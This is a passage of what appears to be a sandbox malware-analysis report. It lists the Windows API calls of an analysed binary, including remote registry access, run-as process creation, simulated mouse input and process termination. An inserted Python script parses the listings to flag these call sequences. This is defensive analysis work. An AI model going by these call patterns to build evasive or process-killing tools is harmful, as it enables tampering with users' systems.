                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00FF9EDA
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00FF9EED
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00FF9F00
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00FF9F13
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00FF9F26
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00FF9F39
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00FF9F4C
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00FF9F5F
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00FF9F72
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00FF9F85
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00FF9F98
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00FF9FAB
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00FF9FBE
                                                                    • __mtinitlocks.LIBCMT ref: 00FF9AEB
                                                                    • __mtterm.LIBCMT ref: 00FF9AF4
                                                                      • Part of subcall function 00FF9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00FF9AF9,00FF7CD0,0108A0B8,00000014), ref: 00FF9C56
                                                                      • Part of subcall function 00FF9B5C: _free.LIBCMT ref: 00FF9C5D
                                                                      • Part of subcall function 00FF9B5C: DeleteCriticalSection.KERNEL32(0108EC00,?,?,00FF9AF9,00FF7CD0,0108A0B8,00000014), ref: 00FF9C7F
                                                                    • __calloc_crt.LIBCMT ref: 00FF9B19
                                                                    • __initptd.LIBCMT ref: 00FF9B3B
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00FF9B42
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                    • String ID:
                                                                    • API String ID: 3567560977-0
                                                                    • Opcode ID: dbd94e8cc997c9f942dba6bfe4b36cb50ba6c74740152d40305bc5b91213cdd7
                                                                    • Instruction ID: 25353f68e2b6fabdb854dc9a01f9151ce7cbcc4dceaaef9f73d3f138de7eb396
                                                                    • Opcode Fuzzy Hash: dbd94e8cc997c9f942dba6bfe4b36cb50ba6c74740152d40305bc5b91213cdd7
                                                                    • Instruction Fuzzy Hash: 33F0CD3291D7191AE7347674BC07B7E36809F42B74B200A19F7A0960FAEEE9850162A4
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00FF3F85), ref: 00FF4085
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00FF408C
                                                                    • EncodePointer.KERNEL32(00000000), ref: 00FF4097
                                                                    • DecodePointer.KERNEL32(00FF3F85), ref: 00FF40B2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 3489934621-2819208100
APIs
Similarity
• API ID: _memmove$__itow__swprintf
• String ID:
• API String ID: 3253778849-0
APIs
  • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
  • Part of subcall function 01050E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0104FDAD,?,?), ref: 01050E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010502BD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 010502FD
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 01050320
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 01050349
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 0105038C
• RegCloseKey.ADVAPI32(00000000), ref: 01050399
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
• String ID:
• API String ID: 4046560759-0
APIs
• GetMenu.USER32(?), ref: 010557FB
• GetMenuItemCount.USER32(00000000), ref: 01055832
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0105585A
• GetMenuItemID.USER32(?,?), ref: 010558C9
• GetSubMenu.USER32(?,?), ref: 010558D7
• PostMessageW.USER32(?,00000111,?,00000000), ref: 01055928
Similarity
• API ID: Menu$Item$CountMessagePostString
• String ID:
• API String ID: 650687236-0
APIs
• VariantInit.OLEAUT32(?), ref: 0102EF06
• VariantClear.OLEAUT32(00000013), ref: 0102EF78
• VariantClear.OLEAUT32(00000000), ref: 0102EFD3
• _memmove.LIBCMT ref: 0102EFFD
• VariantClear.OLEAUT32(?), ref: 0102F04A
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0102F078
Similarity
• API ID: Variant$Clear$ChangeInitType_memmove
• String ID:
• API String ID: 1101466143-0
APIs
• _memset.LIBCMT ref: 01032258
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 010322A3
• IsMenu.USER32(00000000), ref: 010322C3
• CreatePopupMenu.USER32 ref: 010322F7
• GetMenuItemCount.USER32(000000FF), ref: 01032355
• InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 01032386
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• String ID:
• API String ID: 3311875123-0
APIs
  • Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623
• BeginPaint.USER32(?,?,?,?,?,?), ref: 00FD179A
• GetWindowRect.USER32(?,?), ref: 00FD17FE
• ScreenToClient.USER32(?,?), ref: 00FD181B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00FD182C
• EndPaint.USER32(?,?), ref: 00FD1876
Similarity
• API ID: PaintWindow$BeginClientLongRectScreenViewport
• String ID:
• API String ID: 1827037458-0
APIs
• ShowWindow.USER32(010957B0,00000000,01516A70,?,?,010957B0,?,0105B5A8,?,?), ref: 0105B712
• EnableWindow.USER32(00000000,00000000), ref: 0105B736
• ShowWindow.USER32(010957B0,00000000,01516A70,?,?,010957B0,?,0105B5A8,?,?), ref: 0105B796
• ShowWindow.USER32(00000000,00000004,?,0105B5A8,?,?), ref: 0105B7A8
• EnableWindow.USER32(00000000,00000001), ref: 0105B7CC
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 0105B7EF
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,01044E41,?,?,00000000,00000001), ref: 010470AC
  • Part of subcall function 010439A0: GetWindowRect.USER32(?,?), ref: 010439B3
• GetDesktopWindow.USER32 ref: 010470D6
• GetWindowRect.USER32(00000000), ref: 010470DD
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0104710F
  • Part of subcall function 01035244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010352BC
• GetCursorPos.USER32(?), ref: 0104713B
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 01047199
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
APIs
  • Part of subcall function 010280A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 010280C0
  • Part of subcall function 010280A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 010280CA
  • Part of subcall function 010280A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 010280D9
  • Part of subcall function 010280A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 010280E0
  • Part of subcall function 010280A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 010280F6
• GetLengthSid.ADVAPI32(?,00000000,0102842F), ref: 010288CA
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 010288D6
• HeapAlloc.KERNEL32(00000000), ref: 010288DD
• CopySid.ADVAPI32(00000000,00000000,?), ref: 010288F6
• GetProcessHeap.KERNEL32(00000000,00000000,0102842F), ref: 0102890A
• HeapFree.KERNEL32(00000000), ref: 01028911
Similarity
• API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
• String ID:
• API String ID: 3008561057-0
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 010285E2
• OpenProcessToken.ADVAPI32(00000000), ref: 010285E9
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 010285F8
• CloseHandle.KERNEL32(00000004), ref: 01028603
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 01028632
• DestroyEnvironmentBlock.USERENV(00000000), ref: 01028646
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                    • String ID:
                                                                    • API String ID: 1413079979-0
                                                                    • Opcode ID: 3d4e13d605e2513b47842e443bc073bade5e82a928c9709fc2bc455de11f4b05
                                                                    • Instruction ID: 560523f4970b63cc20d351cfae10734b79fecb82bcb6c4fd956592ab19bb82c4
                                                                    • Opcode Fuzzy Hash: 3d4e13d605e2513b47842e443bc073bade5e82a928c9709fc2bc455de11f4b05
                                                                    • Instruction Fuzzy Hash: 971159B650121EABEF218EA8DD49BDF7BE9EF08344F048055FE44A2160C37A9D60DB60
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 0102B7B5
                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0102B7C6
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0102B7CD
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0102B7D5
                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0102B7EC
                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0102B7FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDevice$Release
                                                                    • String ID:
                                                                    • API String ID: 1035833867-0
                                                                    • Opcode ID: 59c08fa19266d13ab2d0cea980f9bcefc0ffc165ab67a2d921bf94fc74133618
                                                                    • Instruction ID: 9bf7313f247807a8f7304e571bd484b84e98af68862d1c75b33c178889d073ea
                                                                    • Opcode Fuzzy Hash: 59c08fa19266d13ab2d0cea980f9bcefc0ffc165ab67a2d921bf94fc74133618
                                                                    • Instruction Fuzzy Hash: 65018475E00319BBEB109BB69C45A5FBFB8EB48351F044065FA44A7281D6359800CFA0
                                                                    APIs
                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FF0193
                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00FF019B
                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FF01A6
                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FF01B1
                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00FF01B9
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FF01C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual
                                                                    • String ID:
                                                                    • API String ID: 4278518827-0
                                                                    • Opcode ID: ef5e38f8294645aefff51316107adff7ee263bb50e3d98407b44493b92ea11c1
                                                                    • Instruction ID: 9d2863c7842b2ffdd4a12c4b087c20dec97d51d9a8b70a8514c0030e70835d4e
                                                                    • Opcode Fuzzy Hash: ef5e38f8294645aefff51316107adff7ee263bb50e3d98407b44493b92ea11c1
                                                                    • Instruction Fuzzy Hash: 110148B090175A7DE3009F6A8C85A52FEA8FF19354F00411BA15847941C7B5A864CBE5
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 010353F9
                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0103540F
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0103541E
                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0103542D
                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 01035437
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0103543E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 839392675-0
                                                                    • Opcode ID: 6e7461cfb14f4b1a153350a1eadc2ecbc987d99258159fd3d3ef4a4646d1327a
                                                                    • Instruction ID: db8b0933b08d89c66498dfdb7d84217b0a15f458c271565aafc3ca110830b373
                                                                    • Opcode Fuzzy Hash: 6e7461cfb14f4b1a153350a1eadc2ecbc987d99258159fd3d3ef4a4646d1327a
                                                                    • Instruction Fuzzy Hash: 4BF01D32241259BBE7315AA29C0DEAB7B7CEBCAB15F000159FA44D20519AAA1A0187B5
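The API listings above are easier to triage once the hex arguments are decoded and the call order is matched against known behaviours: the OpenProcessToken / CreateEnvironmentBlock / CreateProcessWithLogonW sequence (a run-as launch with a freshly built environment block), the six MapVirtualKeyW calls on modifier virtual-key codes (0x5B VK_LWIN, 0x10 VK_SHIFT, 0xA0 VK_LSHIFT, 0xA1 VK_RSHIFT, 0x11 VK_CONTROL, 0x12 VK_MENU), and the PostMessageW WM_CLOSE (0x10), SendMessageTimeoutW with SMTO_ABORTIFHUNG (0x2) and a 500 ms (0x1F4) timeout, OpenProcess with 0x1F0FFF, TerminateProcess sequence (close the window politely, then kill the owning process). The Python below is an added example written for this report; it is not Joe Sandbox or AutoIt code. It parses "APIs" lines in the format rendered on this page (the sample strings are copied from the listings above), decodes the constants, and flags the three sequences. The pattern names, the three-call threshold for the modifier-key rule, and the `Call` record are my own choices, not fields of the report.

```python
"""Parse Joe Sandbox "APIs" listings and flag behavioural API sequences.

Added example for this report (not Joe Sandbox or AutoIt code). Input is
the per-function "APIs" block exactly as rendered on the page.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# One listing line: optional "Part of subcall function XXXX:" prefix,
# API.MODULE, optional (args), then ", ref: ADDR" (LIBCMT lines have no args).
LINE_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

# Constants the listings above use; values are the documented Win32 ones.
WM_CLOSE = 0x0010
SMTO_ABORTIFHUNG = 0x0002
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
            0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}
PROCESS_RIGHTS = {
    0x000001: "PROCESS_TERMINATE", 0x000002: "PROCESS_CREATE_THREAD",
    0x000004: "PROCESS_SET_SESSIONID", 0x000008: "PROCESS_VM_OPERATION",
    0x000010: "PROCESS_VM_READ", 0x000020: "PROCESS_VM_WRITE",
    0x000040: "PROCESS_DUP_HANDLE", 0x000080: "PROCESS_CREATE_PROCESS",
    0x000100: "PROCESS_SET_QUOTA", 0x000200: "PROCESS_SET_INFORMATION",
    0x000400: "PROCESS_QUERY_INFORMATION", 0x000800: "PROCESS_SUSPEND_RESUME",
    0x010000: "DELETE", 0x020000: "READ_CONTROL", 0x040000: "WRITE_DAC",
    0x080000: "WRITE_OWNER", 0x100000: "SYNCHRONIZE",
}

# Ordered call subsequences worth flagging (my own labels, not Joe Sandbox's).
PATTERNS = {
    "close-window-then-terminate-process":
        ["PostMessageW", "SendMessageTimeoutW", "OpenProcess", "TerminateProcess"],
    "run-as-with-fresh-token-environment":
        ["OpenProcessToken", "CreateEnvironmentBlock", "CreateProcessWithLogonW"],
}


@dataclass
class Call:
    api: str
    module: str
    args: list               # int for hex literals, None for '?', str otherwise
    ref: int                 # address of the call site
    subcall: Optional[int]   # callee address when the line is "Part of subcall function"


def _arg(token: str):
    if token == "?":
        return None
    try:
        return int(token, 16)
    except ValueError:          # e.g. the string argument "DllGetClassObject"
        return token


def parse_apis(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [] if raw is None else [_arg(a) for a in raw.split(",") if a != ""]
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), sub))
    return calls


def decode_access(mask: int) -> List[str]:
    """Expand an OpenProcess desired-access mask into named rights."""
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]


def in_order(calls: List[Call], names: List[str]) -> bool:
    """True if every name in `names` occurs in the call list, in that order."""
    it = iter(c.api for c in calls)
    return all(n in it for n in names)   # `in` on an iterator consumes up to the match


def findings(text: str) -> dict:
    calls = parse_apis(text)
    hits = [label for label, seq in PATTERNS.items() if in_order(calls, seq)]
    vks = [c.args[0] for c in calls if c.api == "MapVirtualKeyW" and c.args and c.args[0] in VK_NAMES]
    if len(vks) >= 3:
        hits.append("modifier-key-scancode-mapping")
    notes = []
    for c in calls:
        if c.api == "OpenProcess" and c.args and isinstance(c.args[0], int):
            notes.append("OpenProcess access 0x%X = %s" % (c.args[0], "|".join(decode_access(c.args[0]))))
        if c.api in ("PostMessageW", "SendMessageTimeoutW") and len(c.args) > 1 and c.args[1] == WM_CLOSE:
            notes.append("%s sends WM_CLOSE" % c.api)
        if c.api == "SendMessageTimeoutW" and len(c.args) > 5 and c.args[4] == SMTO_ABORTIFHUNG:
            notes.append("SendMessageTimeoutW SMTO_ABORTIFHUNG, timeout %d ms" % c.args[5])
        if c.api == "MapVirtualKeyW" and c.args and c.args[0] in VK_NAMES:
            notes.append("MapVirtualKeyW(%s)" % VK_NAMES[c.args[0]])
    return {"apis": [c.api for c in calls], "hits": hits, "notes": notes}


# Constructed samples: lines copied from the three function listings above.
SAMPLE_KILL = """\
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 010353F9
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0103540F
• GetWindowThreadProcessId.USER32(?,?), ref: 0103541E
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0103542D
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 01035437
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0103543E
"""
SAMPLE_RUNAS = """\
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 010285E2
• OpenProcessToken.ADVAPI32(00000000), ref: 010285E9
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 010285F8
• CloseHandle.KERNEL32(00000004), ref: 01028603
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 01028632
• DestroyEnvironmentBlock.USERENV(00000000), ref: 01028646
"""
SAMPLE_KEYS = """\
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FF0193
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00FF019B
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FF01A6
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FF01B1
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00FF01B9
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00FF01C1
"""

if __name__ == "__main__":
    for name, sample in (("kill", SAMPLE_KILL), ("runas", SAMPLE_RUNAS), ("keys", SAMPLE_KEYS)):
        r = findings(sample)
        print(name, r["hits"])
        for n in r["notes"]:
            print("   ", n)
```

The subsequence match deliberately ignores interleaved calls (GetWindowThreadProcessId, CloseHandle), so the same rule fires whether or not the compiler or the runtime inserts bookkeeping between the interesting calls. Note that 0x1F0FFF is the pre-Vista PROCESS_ALL_ACCESS value; on current Windows the full mask is 0x1FFFFF, so a listing with 0x1F0FFF is a hint that the binary was built against an older SDK rather than evidence of anything being withheld.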
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 01037243
                                                                    • EnterCriticalSection.KERNEL32(?,?,00FE0EE4,?,?), ref: 01037254
                                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00FE0EE4,?,?), ref: 01037261
                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00FE0EE4,?,?), ref: 0103726E
                                                                      • Part of subcall function 01036C35: CloseHandle.KERNEL32(00000000,?,0103727B,?,00FE0EE4,?,?), ref: 01036C3F
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 01037281
                                                                    • LeaveCriticalSection.KERNEL32(?,?,00FE0EE4,?,?), ref: 01037288
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                    • String ID:
                                                                    • API String ID: 3495660284-0
                                                                    • Opcode ID: 5d61cac1c30909017ac1af881d620aa05a33713d9ad35bd076a0d6b2c7dc1b31
                                                                    • Instruction ID: 63e230f0997f42f2ad39bf5b4a9028c6664fa8b00912a2c434c25fae54a07049
                                                                    • Opcode Fuzzy Hash: 5d61cac1c30909017ac1af881d620aa05a33713d9ad35bd076a0d6b2c7dc1b31
                                                                    • Instruction Fuzzy Hash: D3F0BEBA441303EBEB622B24EC4C9EB3B29EF45342B100121F28390098CB7F1400CB50
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0102899D
                                                                    • UnloadUserProfile.USERENV(?,?), ref: 010289A9
                                                                    • CloseHandle.KERNEL32(?), ref: 010289B2
                                                                    • CloseHandle.KERNEL32(?), ref: 010289BA
                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 010289C3
                                                                    • HeapFree.KERNEL32(00000000), ref: 010289CA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                    • String ID:
                                                                    • API String ID: 146765662-0
                                                                    • Opcode ID: 5db9dd7650ca3f730a794d2d9a3c548d5fab427116b71ac7eefa5dffdfbe9140
                                                                    • Instruction ID: 98544c014540e945cd451b851dfb580cc5fa18790a32b4aab01968378965ebd5
                                                                    • Opcode Fuzzy Hash: 5db9dd7650ca3f730a794d2d9a3c548d5fab427116b71ac7eefa5dffdfbe9140
                                                                    • Instruction Fuzzy Hash: 9BE0E536004206BBDB112FE1EC0C90BBF79FF8A322B108220F259C1468CB3FA420DB54
                                                                    APIs
